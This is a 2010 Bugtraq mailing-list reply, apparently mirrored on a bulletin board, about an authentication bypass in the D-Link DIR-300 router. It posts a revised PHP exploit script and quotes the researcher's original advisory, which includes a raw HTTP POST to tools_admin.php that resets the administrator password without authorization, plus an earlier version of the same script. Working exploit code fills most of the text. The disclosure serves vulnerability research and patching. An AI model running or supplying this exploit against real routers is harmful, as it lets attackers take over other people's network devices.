Re: D-Link DIR-300 authentication bypass

看板Bugtraq作者karol.時間15年前 (2010/11/10 04:01)推噓0(0推 0噓 0→)

留言0則, 0人參與討論串2/9 (看更多)

On some versions of the firmware, exploit says that "something goes wrong" despite of password change is successfull. There is a fixed version: ---cut here--- <?php if(sizeof($argv)!=3D4) { echo "Usage: php5 $argv[0] <router ip addres> <port> <admin password>\n"; exit; } $ch=3Dcurl_init(); curl_setopt($ch, CURLOPT_URL, "http://".$argv[1]."/tools_admin.php"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_PORT, $argv[2]); curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_POSTFIELDS,"ACTION_POST=3DLOGIN&LOGIN_USER=3Da&LOGIN_PASSWD=3Db&log= in=3D+Log+In+&NO_NEED_AUTH=3D1&AUTH_GROUP=3D0&admin_name=3Dadmin&admin_pass= word1=3D".urlencode($argv[3])); echo "+ starting request\n"; $out =3D curl_exec($ch); if($out=3D=3D=3Dfalse) { echo "- Error: could not connect ( http://$argv[1]:$argv[2]/tools_admin.php).\n"; exit; } else echo "+ request sended\n"; curl_close($ch); if(stripos($out,"login.php")=3D=3D=3Dtrue) { echo "- something goes wrong (check answer - answer.html) !\n"; $f=3Dfopen("answer.html","w"); fwrite($f,$out); fclose($f); exit; } else echo "+ ok, now you can login using l: admin p:$argv[3]\n"; ?> ---cut here--- W dniu 9 listopada 2010 10:05 u=C5=BCytkownik Karol Celi=C5=84ski <karol@celin.pl> napisa=C5=82: > [intro] > Hello, I found security bug in D-Link DIR-300 wireless router. It can > be used to bypass authentication mechanizm by attacker with access to > web interface. I reported it to D-Link but they are not replying for > my emails. According to other D-Link security holes and their status I > think that they won't reply, so I decided to write about it here. > > [Technical details] > > Control panel script - tools_admin.php allows attacker to change > administrator name, password and other variables without any > authorization by sending specially crafted http post request such as: > > ---cut here--- > POST http://192.168.1.1:80/tools_admin.php HTTP/1.1 > Host: 192.168.1.2 > Keep-Alive: 115 > Content-Type: application/x-www-form-urlencoded > Content-length: 0 > > ACTION_POST=3DLOGIN&LOGIN_USER=3Da&LOGIN_PASSWD=3Db&login=3D+Log+In+&NO_N= EED_AUTH=3D1&AUTH_GROUP=3D0&admin_name=3Dadmin&admin_password1=3DuhOHahEh > ---cut here--- > > If attacker makes this request to the control panel, the > administrator username is set to admin with password ,,uhOHahEh". > > [Affected] > > - All known D-Link DIR-300 firmware (ie. 2.01B1, 1.04, 1.05). > - There is possibility that other dlink devices which use the same php > scripts in control panel are affected. I'm not able to check it > because I don't have devices for tests. I'm counting on you ;-> > > [Code] > > ---cut here--- > <?php > =C2=A0 =C2=A0 =C2=A0 =C2=A0if(sizeof($argv)!=3D4) { > =C2=A0 =C2=A0 =C2=A0 =C2=A0 =C2=A0 =C2=A0 =C2=A0 =C2=A0echo "Usage: php5 = $argv[0] <router ip addres> <port> > <admin password>\n"; > =C2=A0 =C2=A0 =C2=A0 =C2=A0 =C2=A0 =C2=A0 =C2=A0 =C2=A0exit; > =C2=A0 =C2=A0 =C2=A0 =C2=A0} > =C2=A0 =C2=A0 =C2=A0 =C2=A0$ch=3Dcurl_init(); > =C2=A0 =C2=A0 =C2=A0 =C2=A0curl_setopt($ch, CURLOPT_URL, "http://".$argv[= 1]."/tools_admin.php"); > =C2=A0 =C2=A0 =C2=A0 =C2=A0curl_setopt($ch, CURLOPT_RETURNTRANSFER, true)= ; > =C2=A0 =C2=A0 =C2=A0 =C2=A0curl_setopt($ch, CURLOPT_PORT, $argv[2]); > =C2=A0 =C2=A0 =C2=A0 =C2=A0curl_setopt($ch, CURLOPT_POST, 1); > =C2=A0 =C2=A0 =C2=A0 =C2=A0curl_setopt($ch, CURLOPT_POSTFIELDS, > "ACTION_POST=3DLOGIN&LOGIN_USER=3Da&LOGIN_PASSWD=3Db&login=3D+Log+In+&NO_= NEED_AUTH=3D1&AUTH_GROUP=3D0&admin_name=3Dadmin&admin_password1=3D".urlenco= de($argv[3])); > =C2=A0 =C2=A0 =C2=A0 =C2=A0echo "+ starting request\n"; > =C2=A0 =C2=A0 =C2=A0 =C2=A0$out =3D curl_exec($ch); > =C2=A0 =C2=A0 =C2=A0 =C2=A0if($out=3D=3D=3Dfalse) { > =C2=A0 =C2=A0 =C2=A0 =C2=A0 =C2=A0 =C2=A0 =C2=A0 =C2=A0echo "- Error: cou= ld not connect ( > http://$argv[1]:$argv[2]/tools_admin.php).\n"; > =C2=A0 =C2=A0 =C2=A0 =C2=A0 =C2=A0 =C2=A0 =C2=A0 =C2=A0exit; > =C2=A0 =C2=A0 =C2=A0 =C2=A0} else > =C2=A0 =C2=A0 =C2=A0 =C2=A0 =C2=A0 =C2=A0 =C2=A0 =C2=A0echo "+ request se= nded\n"; > =C2=A0 =C2=A0 =C2=A0 =C2=A0curl_close($ch); > =C2=A0 =C2=A0 =C2=A0 =C2=A0if(stripos($out,"Successfully")=3D=3D=3Dfalse)= { > =C2=A0 =C2=A0 =C2=A0 =C2=A0 =C2=A0 =C2=A0 =C2=A0 =C2=A0echo "- something = goes wrong (check answer - answer.html) !\n"; > =C2=A0 =C2=A0 =C2=A0 =C2=A0 =C2=A0 =C2=A0 =C2=A0 =C2=A0$f=3Dfopen("answer= ..html","w"); fwrite($f,$out); fclose($f); > =C2=A0 =C2=A0 =C2=A0 =C2=A0 =C2=A0 =C2=A0 =C2=A0 =C2=A0exit; > =C2=A0 =C2=A0 =C2=A0 =C2=A0} > =C2=A0 =C2=A0 =C2=A0 =C2=A0else > =C2=A0 =C2=A0 =C2=A0 =C2=A0 =C2=A0 =C2=A0 =C2=A0 =C2=A0echo "+ ok, now yo= u can login using l: admin p:$argv[3]\n"; > ?> > ---cut here--- > > [History] > > =C2=A0- Information sent to vendor 07.08.2010 > =C2=A0- No response > =C2=A0- Information resended to vendor 07.31.2010 > =C2=A0- No response from vendor > > > [Credits] > Karol Celi=C5=84ski ( Celin ) > Pentester/Researcher @ Safe Computing > > [Contact] > > karol at celin dot pl > > [Greetz] > Tomasz Sawiak, Jacek Kowalski, Marcin Kozlowski, Robert Tomczykowski, > Wojtek Machaj, Marek Zmyslowski, Szymon Sobczyk and all Safe Computing > members. >

‣ 返回看板[ Bugtraq ] 臭蟲

‣ 更多 karol. 的文章

文章代碼(AID): #1CsQX-zC (Bugtraq)